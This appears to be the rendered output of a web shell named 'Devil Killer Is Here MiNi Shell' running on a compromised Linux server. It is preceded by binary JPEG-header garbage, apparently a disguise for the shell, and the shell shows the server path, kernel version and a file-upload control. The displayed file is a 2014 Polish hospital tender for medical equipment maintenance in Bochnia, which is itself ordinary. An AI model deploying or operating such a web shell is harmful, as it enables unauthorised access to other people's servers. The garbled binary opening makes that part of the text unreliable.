JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140626/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140626/137533-N-2014.html

<p class="kh_header"><b>Bochnia: Usługi w zakresie wykonywania przeglądów technicznych oraz napraw bieżących sprzętu medycznego dla Samodzielnego Publicznego Zespołu Opieki Zdrowotnej w Bochni
Szpital Powiatowy im. bł. Marty Wieckiej</b><br>
<b>Numer ogłoszenia: 137533 - 2014; data zamieszczenia: 26.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Bochni "Szpital Powiatowy" im. bł. Marty Wieckiej , ul. Krakowska 31, 32-700 Bochnia, woj. małopolskie, tel. 14 6153201, 6153233, 50979196, faks 14 6153202.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-bochnia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi w zakresie wykonywania przeglądów technicznych oraz napraw bieżących sprzętu medycznego dla Samodzielnego Publicznego Zespołu Opieki Zdrowotnej w Bochni
Szpital Powiatowy im. bł. Marty Wieckiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług w zakresie wykonywania przeglądów technicznych oraz napraw bieżących sprzętu medycznego dla Samodzielnego Publicznego Zespołu Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej

Przedmiot zamówienia został podzielony na zadania:
Zadanie nr 1 Sprzęt medyczny -  Lampy, łóżka, ssaki, inhalatory.
Zadanie nr 2 Zestawy monitorujące, kardiomonitory, kardiotokografy
Zadanie nr 3 Aparaty EKG, Pompy infuzyjne
Zadanie nr 4 Respiratory z zestawami monitorującymi 
Zadanie nr 5 Respiratory Bennet
Zadanie nr 6 Respiratory inne
Zadanie nr 7 Defibrylatory, Pulsoksymetry
Zadanie nr 8 Inkubatory i sprzęt do leczenia noworodków
Zadanie nr 9 Aparaty do znieczulania
Zadanie nr 10 Aparaty do znieczulania
Zadanie nr 11 Lancentrony, Diatermie
Zadanie nr 12 Sterylizatory, autoklawy, 
Zadanie nr 13 Aparatura radiologiczna
Zadanie nr 14 Aparatura ultrasonograficzna
Zadanie nr 15 Aparatura endoskopowa I
Zadanie nr 16 Aparatura endoskopowa II
Zadanie nr 17 Zestaw  Histeroskopowy, Laparoskopowy
Zadanie nr 18 Urządzenia do fizykoterapii
Zadanie nr 19 Urządzenia do mycia
Zadanie nr 20 Urządzenia laboratoryjne-różne
Zadanie nr 21 Aparat do hemodializy 
Zadanie nr 22 Sprzęt medyczny - pozostały
Zadanie nr 23 Aparatura Echokardiograficzna
Zadanie nr 24 Urządzenia do podawania kontrastu
Zadanie nr 25 Aparat do znieczulania
Zadanie nr 26 Aparatura laboratoryjna I
Zadanie nr 27 Napęd traumatologiczny
Zadanie nr 28 Aparatura Laboratoryjna II
Zadanie nr 29 Aparatura Laboratoryjna III
Zadanie nr 30 Aparatura okulistyczna I
Zadanie nr 31 Aparatura okulistyczna II
Zadanie nr 32 Urządzenie do badania słuchu
Zadanie nr 33 Wagi.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.42.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 33.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawione przez Wykonawcę oświadczenie. Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawione przez Wykonawcę oświadczenie. Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawione przez Wykonawcę oświadczenie. Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawione przez Wykonawcę oświadczenie. Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawione przez Wykonawcę oświadczenie. Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	W przypadku podpisywania oferty lub poświadczania za zgodność z oryginałem kopii dokumentów przez osob(ę)y nie wymienion(ą)e w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwa. W przypadku udzielenia pełnomocnictwa, wymagana jest forma, rodzaj i zakres pełnomocnictwa właściwy do poszczególnych czynności. Kserokopia pełnomocnictwa musi być poświadczona przez notariusza.
2.	W przypadku gdy, Wykonawca powołuje się na wiedzę i doświadczenie, potencjał techniczny, osoby zdolne do wykonania zamówienia lub zdolności finansowe innych podmiotów - pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia wraz z określeniem zakresu udzielanych zasobów. 
3.	Pełnomocnictwo do reprezentowania konsorcjum w postępowaniu o udzielenie zamówienia publicznego lub do reprezentowania w postępowaniu o udzielenie zamówienia publicznego i zawarcia umowy - w przypadku wykonawców wspólnie ubiegający się o udzielenie 
Dokumenty mogą być przedstawione w formie oryginału lub kopii poświadczonych (każda strona dokumentu) za zgodność z oryginałem przez  wykonawcę.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	1.	Wszelkie zmiany niniejszej umowy z zastrzeżeniem art. 144 ust. 1 ustawy mogą być dokonywane za zgodą obu Stron, wyrażoną na piśmie, pod rygorem nieważności. 
2.	Strony dopuszczają zmiany w umowie w następującym zakresie:
a)	Wykonawca zobowiązuje się do nie zwiększania cen jednostkowych określonych w ofercie przetargowej przez okres trwania umowy, z tym zastrzeżeniem, że w czasie trwania umowy ceny netto mogą ulec zmianie odpowiednio do wzrostu/spadku obowiązujących stawek podatku VAT, przy obowiązku zachowania niezmiennej ceny brutto. 
b)	w każdym czasie trwania umowy Wykonawca może dokonać obniżki cen jednostkowych i nie wymaga zgody Zamawiającego ani sporządzenia Aneksu do umowy
c)	zmiany wykazu sprzętu objętego przedmiotem umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-bochnia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej ul. Krakowska 31 32-700 Bochnia, Dział Zaopatrzenia i Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.07.2014 godzina 12:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego w Bochni przy ul. Krakowskiej 31, na Dzienniku podawczym pokój nr 3, Pawilon A..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 Sprzęt medyczny -  Lampy, łóżka, ssaki, inhalatory.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	Nazwa urządzenia	Typ/ model	Ilość urządzeń	Przewidywana ilość przeglądów na okres trwania umowy
1.	2.	3.	4.	5.
1.	Ssak elektryczny	WAN M1	3	1
2.	Ssak elektryczny	SO -4	1	1
3.	Ssak elektryczny	SSU-2	2	1
4.	Ssak elektryczny	V 7 plus	7	1
5.	Ssak elektryczny	JA-VAC-2	1	1
6.	Ssak elektryczny	SK - 07	1	1
7.	Ssak elektryczny	ASCOR  C-30	2	1
8.	Ssak elektryczny	WAN M	1	1
9.	Ssak elektryczny		1	1
10.	Inhalator	Medix AC 2000	1	1
11.	Inhalator	Parimaster	1	1
12.	Inhalator	Pari-Boy	2	1
13.	Inhalator	MR  Beetle	5	1
14.	Inhalator	Turbo Pari-Boy	2	1
15.	Inhalator	Biedronka	1	1
16.	Inhalator	Elisir	3	1
17.	Spirometr	Pneumo	1	1
18.	Spirometr	Lungtest	2	1
19.	Łóżko  elektryczne 	LE - 12.0	10	1
20.	Łóżko elektryczne 	Le - 02.0	8	1
21.	Łóżko porodowe 	Affinity	3	1
22.	Stół operacyjny	SU 	4	1
23.	Stół oper hydraul-elektr.	Etiuda	2	1
24.	Lampa  4-ogniskowa + zasilacz	Z-430	4	1
25.	Lampa operacyjna sufitowa podwójna 	ML 600/D 	4	1
26.	Lampa zabiegowa scienna  jednogniskowa	Medlux 0975	11	1
27.	Lampa zabiegowa  jednogniskowa	BH 132	6	1
28.	Lampa  zabiegowa jednogniskowa	PM - 121., jezdna	2	1
29.	Lampa Sollux	LSK	13	1
30.	Lampa promiennikowa do ogrzewania noworodka		5	1
31.	Lampa zabiegowa 	Prowita	4	1
32.	Lampa fototerapii 	diodowa	2	1
33.	Lampa do fototerapii	KLA  32	1	1
34.	Lampa do fototerapii	NEO-BLUE 	3	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 Zestawy monitorujące, kardiomonitory, kardiotokografy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	Nazwa urządzenia	Typ/ model	Ilość urządzeń	Przewidywana ilość przeglądów na okres trwania umowy
1.	2.	3.	4.	5.
1.	Kardiomonitor	FX - 862	3	1
2.	Kardiomonitor	Biazet	2	1
3.	Kardiomonitor	Icard M26	2	1
4.	Kardiomonitor 	Icard M78	1	1
5.	Kardiomonitor	Icard M88	1	1
6.	Kardiomonitor	Icard M 98	1	1
7.	Kardiomonitor	Icard M6	1	1
8.	Kardiomonitor 	Diaskope 2	2	1
9.	Kardiomonitor	Propaq 244	2	1
10.	Monitor nieinwazyjny	C -3	2	1
11.	Monitor parametrów życiowych 	Colin	1	1
12.	Kardiotokograf	Sonicard	3	1
13.	Kardiotokograf	Oxford Sonicard	1	1
14.	Kardiotokograf	M 1351 A	1	1
15.	Kardiotokograf	FM 20	1	1
16.	Kardiomonitor	Suresings	2	1
17.	Kardiomonitor	FX 2000	19	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3 Aparaty EKG, Pompy infuzyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	Nazwa urządzenia	Typ/ model	Ilość urządzeń	Przewidywana ilość przeglądów na okres trwania umowy
1.	2.	3.	4.	5.
1.	Elektrokardiograf	Multicard E-30	1	1
2.	Elektrokardiograf	Ascard Blue	4	1
3.	Elektrokardiograf	Midicard	2	1
4.	Elektrokardiograf	Ascard B5	2	1
5.	Elektrokardiograf	Ascard 	2	1
6.	Elektrokardiograf	Ascard 3	1	1
7.	Elektrokardiograf	MR  BLUE	3	1
8.	Rejestrator 	CR 07	2	1
9.	Rejestrator	Aspekt 702	4	1
10.	Zestaw badań wysiłkowych	CRG 3	1	1
11.	Bieżnia do ćwiczeń	RB 612	2	1
12.	Pompa infuzyjna	Aitecs  2015	21	1
13.	Pompa infuzyjna	Pluma A 07A	4	1
14.	Pompa infuzyjna	Program	4	1
15.	Pompa infuzyjna	Ascor	30	1
16.	Pompa infuzyjna 	Pilot A	3	1
17.	Pompa infuzyjna	Kwapisz	4	1
18.	Pompa infuzyjna 	Braun	2	1
19.	Pompa infuzyjna	Medima	3	1
20.	Pompa infuzyjna 	Agilia	4	1
21.	Pompa infuzyjna 	Alaris GH	3	1
22.	Pompa infuzyjna	Duet 	3	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4 Respiratory z zestawami monitorującymi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	Nazwa urządzenia	Typ/ model	Ilość urządzeń	Przewidywana ilość przeglądów na okres trwania umowy
1.	2.	3.	4.	5.
1.	Respirator 	Pulmolog	4	2
2.	Respirator 	Oxylog 100	1	2
3.	Respirator	Biomedical	2	2
4.	Respirator	Vivo 50	3	1
5.	Respirator	Medumad	1	2
6.	Respirator 	HFS 3000	2	2
7.	Respirator	Osirus 3	7	1
8.	Respirator	Cerewent	2	1
9.	Respirator	Raphel	1	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5 Respiratory Bennet.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	Nazwa urządzenia	Typ/ model	Ilość urządzeń	Przewidywana ilość przeglądów na okres trwania umowy
1.	2.	3.	4.	5.
1.	Respirator	NPB 760	3	1
2.	Respirator	NPB 840	1	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 6 Respiratory inne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	Nazwa urządzenia	Typ/ model	Ilość urządzeń	Przewidywana ilość przeglądów na okres trwania umowy
1.	2.	3.	4.	5.
1.	Respirator	Bird 840	1	1
2.	Respirator	Awea	1	1
3.	Aparat do resuscytacji Neo-puff	RD 900	5	1
4.	Aparat do nieinwazyjnego  wspomagania oddechu  	Infant flov	3	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie nr 7 Defibrylatory, Pulsoksymetry.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	Nazwa urządzenia	Typ/ model	Ilość urządzeń	Przewidywana ilość przeglądów na okres trwania umowy
1.	2.	3.	4.	5.
1.	Defibrylator	CODEMASTER	1	1
2.	Defibrylator	SCP  912	2	1
3.	Defibrylator	Life Pack 12	9	1
4.	Defibrylator	Life Pack 15	6	1
5.	Pulsoksymetr	Oxypleth	8	1
6.	Pulsoksymetr	N-395	1	1
7.	Pulsoksymetr	Ul  2601	1	1
8.	Pulsoksymetr	Rad-9	1	1
9.	Pulsoksymetr	N  65	8	1
10.	Pulsoksymetr	Nowa metrix	2	1
11.	Pulsoksymetr	9847	2	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie nr 8 Inkubatory i sprzęt do leczenia noworodków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	Nazwa urządzenia	Typ/ model	Ilość urządzeń	Przewidywana ilość przeglądów na okres trwania umowy
1.	2.	3.	4.	5.
1.	Inkubator Ciepłe gniazdko	Ciepłe gniazdko	1	1
2.	Inkubator	RN 04/3M	1	1
3.	Inkubator	RN  3M	1	1
4.	Inkubator	Atom 2100	1	1
5.	Inkubator	Atom V - 85	2	1
6.	Inkubator	IM 7320	1	1
7.	Inkubator	SPN 03	1	1
8.	Inkubator	SRN  10	3	1
9.	Inkubator	Isolette 	1	1
10.	Ogrzewacz	IR  10	1	1
11.	Stanowisko  do pielegnacji noworodka	SPN 1900Z	14	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie nr 9 Aparaty do znieczulania.</p>
